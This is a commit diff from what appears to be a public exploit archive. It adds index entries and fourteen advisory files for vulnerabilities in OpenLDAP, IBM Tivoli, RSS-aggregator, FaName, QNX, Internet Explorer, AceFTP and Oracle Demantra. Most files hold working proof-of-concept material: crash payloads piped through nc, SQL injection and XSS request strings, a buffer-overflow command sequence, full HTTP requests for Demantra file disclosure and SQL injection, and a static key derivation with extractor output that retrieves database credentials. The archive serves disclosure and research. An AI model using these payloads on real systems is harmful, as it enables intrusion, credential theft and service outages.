Updated 03_03_2014
This commit is contained in:
parent
d02449c714
commit
b3951809b4
15 changed files with 450 additions and 0 deletions
14
files.csv
14
files.csv
|
@ -28769,3 +28769,17 @@ id,file,description,date,author,platform,type,port
|
|||
31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
|
||||
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
|
||||
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
|
||||
31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
|
||||
31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
|
||||
31994,platforms/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Stored XSS Vulnerability",2014-03-01,Portcullis,windows,webapps,8080
|
||||
31995,platforms/windows/webapps/31995.txt,"Oracle Demantra 12.2.1 - Database Credentials Disclosure",2014-03-01,Portcullis,windows,webapps,8080
|
||||
31996,platforms/windows/remote/31996.txt,"Microsoft Internet Explorer 7/8 Beta 1 Frame Location Cross Domain Security Bypass Vulnerability",2008-06-27,"Eduardo Vela",windows,remote,0
|
||||
31997,platforms/windows/remote/31997.txt,"AceFTP 3.80.3 'LIST' Command Directory Traversal Vulnerability",2008-06-27,"Tan Chew Keong",windows,remote,0
|
||||
31999,platforms/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x Adding 'ibm-globalAdminGroup' Entry Denial of Service Vulnerability",2008-06-30,anonymous,multiple,dos,0
|
||||
32000,platforms/linux/dos/32000.txt,"OpenLDAP <= 2.3.41 BER Decoding Remote Denial of Service Vulnerability",2008-06-30,"Cameron Hotchkies",linux,dos,0
|
||||
32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
|
||||
32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0
|
||||
32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 admin/fonctions/ Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0
|
||||
32004,platforms/php/webapps/32004.txt,"FaName 1.0 index.php Multiple Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0
|
||||
32005,platforms/php/webapps/32005.txt,"FaName 1.0 page.php name Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0
|
||||
32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 'phgrafx' Local Buffer Overflow Vulnerability",2008-07-01,"Filipe Balestra",unix,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
10
platforms/linux/dos/32000.txt
Executable file
10
platforms/linux/dos/32000.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/30013/info
|
||||
|
||||
OpenLDAP is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to deny service to legitimate users by crashing affected servers.
|
||||
|
||||
OpenLDAP 2.3.41 is vulnerable to this issue; earlier versions back to approximately 2.1.18 as well as newer versions may also be affected.
|
||||
|
||||
slapd -h ldap:// -d511 &
|
||||
perl -e 'print "\xff\xff\xff\x00\x84\x41\x42\x43\x44"' | nc localhost 389
|
14
platforms/multiple/dos/31999.txt
Executable file
14
platforms/multiple/dos/31999.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/30010/info
|
||||
|
||||
IBM Tivoli Directory Server is prone to a denial-of-service vulnerability because the server contains a double-free error.
|
||||
|
||||
An attacker can exploit this issue to crash the affected server with a SIGSEGV fault, denying service to legitimate users.
|
||||
|
||||
Tivoli Directory Server 6.1.0.0 - 6.1.0.15 are affected.
|
||||
|
||||
The following 'ldapadd' entry is sufficient to trigger the issue:
|
||||
|
||||
dn: globalGroupName=GlobalAdminGroup,cn=ibmpolicies
|
||||
globalGroupName: GlobalAdminGroup
|
||||
objectclass: top
|
||||
objectclass: ibm-globalAdminGroup
|
9
platforms/php/webapps/32001.txt
Executable file
9
platforms/php/webapps/32001.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/30016/info
|
||||
|
||||
RSS-aggregator is prone to multiple SQL-injection and authentication-bypass vulnerabilities.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, and gain administrative access to the affected application.
|
||||
|
||||
RSS-aggregator 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/fonctions/supprimer_flux.php?IdFlux=[SQL injection]
|
9
platforms/php/webapps/32002.txt
Executable file
9
platforms/php/webapps/32002.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/30016/info
|
||||
|
||||
RSS-aggregator is prone to multiple SQL-injection and authentication-bypass vulnerabilities.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, and gain administrative access to the affected application.
|
||||
|
||||
RSS-aggregator 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/fonctions/supprimer_tag.php?IdTag=[SQL injection]
|
10
platforms/php/webapps/32003.txt
Executable file
10
platforms/php/webapps/32003.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/30016/info
|
||||
|
||||
RSS-aggregator is prone to multiple SQL-injection and authentication-bypass vulnerabilities.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, and gain administrative access to the affected application.
|
||||
|
||||
RSS-aggregator 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/admin/fonctions/supprimer_flux.php?IdFlux=5
|
||||
http://www.example.com/admin/fonctions/modifier_tps_rafraich.php?TpsRafraich=500
|
9
platforms/php/webapps/32004.txt
Executable file
9
platforms/php/webapps/32004.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/30019/info
|
||||
|
||||
FaName is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks
|
||||
|
||||
FaName 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/[FANAME-DIRECTORY]/index.php?key="><script>alert(document.cookies)</script> http://www.example.com/[FANAME-DIRECTORY]/index.php?desc="><script>alert(document.cookies)</script>
|
9
platforms/php/webapps/32005.txt
Executable file
9
platforms/php/webapps/32005.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/30019/info
|
||||
|
||||
FaName is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks
|
||||
|
||||
FaName 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/[FANAME-DIRECTORY]/page.php?name=<script>alert(document.cookies)</script>
|
14
platforms/unix/dos/32009.txt
Executable file
14
platforms/unix/dos/32009.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/30024/info
|
||||
|
||||
QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.
|
||||
|
||||
Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.
|
||||
|
||||
QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.
|
||||
|
||||
# PHOTON_PATH=/tmp
|
||||
# cd /tmp
|
||||
# mkdir palette
|
||||
# cd palette
|
||||
# touch `perl -e 'print "A" x 290 . ".pal"'`
|
||||
# /usr/photon/bin/phgrafx
|
10
platforms/windows/remote/31996.txt
Executable file
10
platforms/windows/remote/31996.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/29986/info
|
||||
|
||||
Microsoft Internet Explorer is prone to a cross-domain scripting security-bypass vulnerability because the application fails to properly enforce the same-origin policy.
|
||||
|
||||
An attacker can exploit this issue to change the location of a frame from a different domain. This allows the attacker to execute arbitrary code in a frame of the same window as content from a different domain. Successful exploits will allow the attacker to access information from the parent document via DOM components that are not domain-reliant (such as the 'onmousedown' event).
|
||||
|
||||
Internet Explorer 6, 7, and 8 Beta 1 are vulnerable; other versions may also be affected.
|
||||
|
||||
javascript:x=open('http://example.com/');setInterval(function(){try{x.frames[0].location={toString:function(){return
|
||||
.http://www.example2.com/somescript.html.;}}}catch(e){}},5000);void(1);
|
12
platforms/windows/remote/31997.txt
Executable file
12
platforms/windows/remote/31997.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/29989/info
|
||||
|
||||
AceFTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue allows an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.
|
||||
|
||||
AceFTP Freeware 3.80.3 and AceFTP Freeware 3.80.3 are vulnerable; other versions may also be affected.
|
||||
|
||||
Response to LIST:
|
||||
|
||||
/../../../../../../../../../testfile.txt\r\n
|
||||
|
72
platforms/windows/webapps/31992.txt
Executable file
72
platforms/windows/webapps/31992.txt
Executable file
|
@ -0,0 +1,72 @@
|
|||
Details:
|
||||
|
||||
The Team discovered a Local File Include (LFI) vulnerability. A file inclusion vulnerability occurs when a file from the target system is injected into a page on the attacked server page.
|
||||
|
||||
The vulnerable page is:
|
||||
* /demantra/GraphServlet
|
||||
Impact:
|
||||
|
||||
Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
|
||||
|
||||
- Harvest useful information from the web.xml configuration file.
|
||||
|
||||
- Download the whole web application source code like the vulnerable page itself.
|
||||
Exploit:
|
||||
|
||||
Request:
|
||||
|
||||
POST /demantra/GraphServlet HTTP/1.1
|
||||
Host: 192.168.14.171:8080
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 46
|
||||
|
||||
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
|
||||
|
||||
Response:
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Server: Apache-Coyote/1.1
|
||||
Pragma: No-cache
|
||||
Cache-Control: no-cache
|
||||
Expires: Thu, 01 Jan 1970 00:00:00 GMT
|
||||
Content-Type: image/png
|
||||
Content-Length: 44378
|
||||
Date: Fri, 02 Aug 2013 20:20:58 GMT
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
|
||||
<web-app
|
||||
id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
|
||||
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
|
||||
|
||||
|
||||
|
||||
|
||||
<!-- Important Notice -->
|
||||
<!--
|
||||
The order of elements in the web.xml is significant for some
|
||||
Application Server parsers like WebSphere. The expected order is
|
||||
examplified in the comments of this file. Each element section has a
|
||||
Start comment(***) and an End comment. Please make sure to add new
|
||||
elements in the appropriate section of the file delimited by the
|
||||
relevant comment.
|
||||
-->
|
||||
|
||||
<!-- ***Icons Start -->
|
||||
<!-- ***Icons End -->
|
||||
-snip-?
|
||||
|
||||
Copyright:
|
||||
|
||||
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
Disclaimer:
|
||||
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
71
platforms/windows/webapps/31993.txt
Executable file
71
platforms/windows/webapps/31993.txt
Executable file
|
@ -0,0 +1,71 @@
|
|||
Details:
|
||||
|
||||
Application is vulnerable to SQL injection.
|
||||
Impact:
|
||||
|
||||
An attacker with access to the vulnerable pages could manipulate the queries being sent to the database, potentially enabling them to:
|
||||
|
||||
- Extract sensitive information, including (but not limited to) authentication credentials and personal details. Such information could be sold by the attacker to other malicious individuals, used in other attacks (as the same password is often used across systems) or released publicly to damage the organisation’s reputation.
|
||||
|
||||
- Modify content within the application. If this was possible, the attacker could add malicious code to the application, which could then be used to deliver malware or exploit issues within client browsers.
|
||||
|
||||
In this particular instance, exploitation was more difficult as the results of the attack had to inferred based on the pages returned, often referred to as “blind” SQL Injection. This does not prevent exploitation, it simply means that the methods required to perform this attack require a very large number of requests to be made. However, because of this it is potentially easier to identify that an attack using this method is being attempted.
|
||||
Exploit:
|
||||
|
||||
POST /demantra/portal/editExecDefinition.jsp HTTP/1.1
|
||||
Host: www.target.com:8080
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer: http://www.target.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076
|
||||
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 388
|
||||
|
||||
done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23¶m=
|
||||
|
||||
Related Error Log Entry:
|
||||
|
||||
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.sql: ODPM-70173: Error SQL:
|
||||
[error occurred during batching: ORA-01756: quoted string not properly terminated]
|
||||
UPDATE EXEC_DEFINITION SET MENU_ITEM_ID = 10,EXEC_ID = 5,EXEC_PATH = '',EXEC_NAME = 'http://www.oracle.com/demantra/index.htm'',PARAMETERS = '',EXEC_TYPE = 3
|
||||
WHERE EXEC_ID = 5
|
||||
2013-08-01 16:42:11,039 PDT [http-8080-6] ERROR appserver.error:
|
||||
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-01756: quoted string not properly terminated at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
|
||||
|
||||
Sample Request #2:
|
||||
|
||||
POST /demantra/portal/saveProgramGroups.jsp HTTP/1.1
|
||||
Host: www.target.com:8080
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer: http://www.target.com:8080/demantra/portal/programGroupDefinition.jsp
|
||||
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=AC4D868CFC8F2B0CF06B62426A9F8CF7
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 170
|
||||
|
||||
selectedPGItems=SEL_TYPE_1_MODULE_5_ID_267%2CSEL_TYPE_1_MODULE_5_ID_267%2C&tkn=548771231479710&PGName=aaa'&PGDescription=aaaa&objectFilter=1&SEL_TYPE_1_MODULE_5_ID_267=on
|
||||
|
||||
Related Error Log Entry:
|
||||
|
||||
… 39 more
|
||||
|
||||
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.sql: ODPM-70173: Error SQL:
|
||||
[error occurred during batching: ORA-00933: SQL command not properly ended]
|
||||
UPDATE PROGRAM_GROUPS SET NAME = 'aaa'',DESCRIPTION = 'aaaa' WHERE PROGRAM_GROUP_ID = 9
|
||||
2013-08-01 16:57:40,287 PDT [http-8080-9] ERROR appserver.error:
|
||||
com.demantra.applicationServer.appServerExceptions.FailedToExcuteBatch: java.sql.BatchUpdateException: error occurred during batching: ORA-00933: SQL command not properly ended at com.demantra.applicationServer.services.DBServicesCommon.excuteBatch(DBServicesCommon.java:1446)
|
||||
|
||||
Copyright:
|
||||
|
||||
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
Disclaimer:
|
||||
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
146
platforms/windows/webapps/31994.txt
Executable file
146
platforms/windows/webapps/31994.txt
Executable file
|
@ -0,0 +1,146 @@
|
|||
Details:
|
||||
|
||||
The TaskSender area is vulnerable to a stored cross-site scripting vulnerability.
|
||||
Impact:
|
||||
|
||||
An attacker could exploit this flaw to get active HTML or script code executed in an authenticated user’s browser. Cross-site Scripting may be used to perform attacks such as session hijacking by invoking the user’s browser to send information stored in their cookies (such as a session identification token) to an arbitrary location controlled by the attacker. Furnished with this information the attacker could immediately access the site, masquerading as the authenticated user who viewed the page containing the malicious code. The attacker would then be able to perform actions as the authorised user, subject to their role, which could include viewing sensitive data, modifying profile information and making transactions.
|
||||
|
||||
This vulnerability could also be leveraged in a “phishing” attack, whereby the attacker adds additional HTML code to create a false login page within the vulnerable page, which posts the data to a server controlled by the attacker. The attacker could then redirect the user back to the original server, thus giving the illusion that the login was secure and genuine. This could also be achieved by redirecting the user to a false login page on the attacker’s server rather than adding the code to a page that already exists. This is critical, because if the attacker could host a “phishing” website in a domain with a valid SSL certificate, there would be no way for a user to spot the attack.
|
||||
|
||||
A variation of the “phishing” attack described above would be to inject code to completely rewrite the genuine page, defacing the site and possibly having a detrimental impact on the reputation of the company.
|
||||
|
||||
Finally, an attacker could use Cross-site Scripting to exploit vulnerabilities within web browsers. The outcome of such an attack would depend on the exploits used, but in a worst case scenario the attacker could gain full control of a user’s computer. Once that had been achieved it would be trivial for the attacker to install a keystroke logger and gain access to applications via the usernames and passwords they had acquired.
|
||||
|
||||
In the case of the current web application, the Cross-site Scripting was “reflective”, meaning that a user would need to follow a specially crafted link for the attack to be successful.
|
||||
Exploit:
|
||||
|
||||
Request:
|
||||
|
||||
POST /demantra/TaskSender HTTP/1.1
|
||||
Host: www.target.com:8080
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305
|
||||
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F
|
||||
Connection: keep-alive
|
||||
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291
|
||||
Content-Length: 3093
|
||||
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="selectedUsersVector"
|
||||
|
||||
389
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="selectedUserList"
|
||||
|
||||
389;
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="message"
|
||||
|
||||
asdasda
|
||||
----------97315614820331578362291
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
asdasdasdas
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="url"
|
||||
|
||||
aaa"onmouseover="alert(document.cookie)
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="sendEmail"
|
||||
|
||||
1
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="hidden_dueTime"
|
||||
|
||||
08/02/2013
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="hidden_alertTime"
|
||||
|
||||
08/02/2013
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="hidden_dueTimeHours"
|
||||
|
||||
14:30
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="hidden_alertTimeHours"
|
||||
|
||||
08:30
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="hidden_escalateUserList"
|
||||
|
||||
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="combination"
|
||||
|
||||
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="dueTime"
|
||||
|
||||
08/02/2013
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="alertTime"
|
||||
|
||||
08/02/2013
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="tkn"
|
||||
|
||||
187120466014305
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="attachment"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="localizedDueTime"
|
||||
|
||||
08/02/2013
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="dueTimeHours"
|
||||
|
||||
14:30
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="localizedAlertTime"
|
||||
|
||||
08/02/2013
|
||||
---------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="alertTimeHours"
|
||||
|
||||
08:30
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="escalateUserList"
|
||||
|
||||
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="sendEmailCheckbox"
|
||||
|
||||
on
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="x"
|
||||
|
||||
50
|
||||
-----------------------------12454397315614820331578362291
|
||||
Content-Disposition: form-data; name="y"
|
||||
|
||||
7
|
||||
-----------------------------12454397315614820331578362291--
|
||||
|
||||
Resulting Code in page:
|
||||
|
||||
<!-- Message -->
|
||||
|
||||
<td class="columnCellMessage">
|
||||
|
||||
<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">
|
||||
|
||||
<b>asdasda</b>
|
||||
|
||||
Copyright:
|
||||
|
||||
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
Disclaimer:
|
||||
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
41
platforms/windows/webapps/31995.txt
Executable file
41
platforms/windows/webapps/31995.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
Details:
|
||||
|
||||
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
|
||||
Impact:
|
||||
|
||||
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
|
||||
Exploit:
|
||||
|
||||
The target URL is:
|
||||
|
||||
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
|
||||
|
||||
Now the UAK key is calculated statically:
|
||||
|
||||
String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
|
||||
|
||||
StringBuffer tmp = new StringBuffer("sge");
|
||||
tmp.append(0);
|
||||
tmp.append(encryptedPassword);
|
||||
|
||||
uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
|
||||
|
||||
From that information it is possible to create a simple extractor:
|
||||
|
||||
pixel:demantra user$ java getUAK
|
||||
-=[Oracle Demantra Database Details Retriever ]=-
|
||||
|
||||
[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
|
||||
[+] Retrieved the following encrypted string:
|
||||
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
|
||||
[+] Decrypted string is:
|
||||
TEST?test?demantra?orc?1
|
||||
|
||||
Together with the authentication bypass this can be exploited unauthenticated as well.
|
||||
|
||||
Copyright:
|
||||
|
||||
Copyright © Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
Disclaimer:
|
||||
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
Loading…
Add table
Reference in a new issue